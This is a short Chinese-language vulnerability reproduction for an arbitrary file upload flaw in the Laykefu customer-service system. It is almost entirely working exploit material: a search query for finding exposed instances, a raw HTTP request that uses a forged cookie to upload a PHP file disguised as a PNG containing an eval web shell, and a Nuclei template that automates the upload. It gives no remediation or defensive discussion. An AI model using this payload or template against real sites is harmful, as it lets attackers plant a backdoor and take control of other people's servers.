Laykefu客服系统 任意文件上传漏洞复现

# 搜索语法icon_hash="-334624619"

POST /admin/users/upavatar.html HTTP/1.1Host: 127.0.0.1Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kRAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: user_name=1; user_id=3Connection: close------WebKitFormBoundary3OCVBiwBVsNuB2kRContent-Disposition: form-data; name="file"; filename="1.php"Content-Type: image/png<?php phpinfo();@eval($_POST['sec']);?>------WebKitFormBoundary3OCVBiwBVsNuB2kR--

id: Laykefu-Uploadinfo:  name: Laykefu-Upload  author: lanyue  severity: high  description: Laykefu-Upload-GetShell  reference:  - https://github.com/  - https://cve.mitre.org/  metadata:    max-request: 1    shodan-query: ""    verified: truehttp:- method: POST  path:  - '{{RootURL}}/admin/users/upavatar.html'  headers:    Accept: application/json, text/javascript, */*; q=0.01    Accept-Encoding: gzip, deflate    Accept-Language: zh-CN,zh;q=0.9    Connection: close    Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR    Cookie: user_name=1; user_id=3    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML,      like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26    X-Requested-With: XMLHttpRequest  body: "------WebKitFormBoundary3OCVBiwBVsNuB2kRrnContent-Disposition: form-data;    name="file"; filename="1.php"rnContent-Type: image/pngrn rn<?php phpinfo();?>rn------WebKitFormBoundary3OCVBiwBVsNuB2kR--"  max-redirects: 3  matchers-condition: and  matchers:  - type: regex    part: body    regex:    - .{30,}.php  - type: status    part: body    status:    - "200"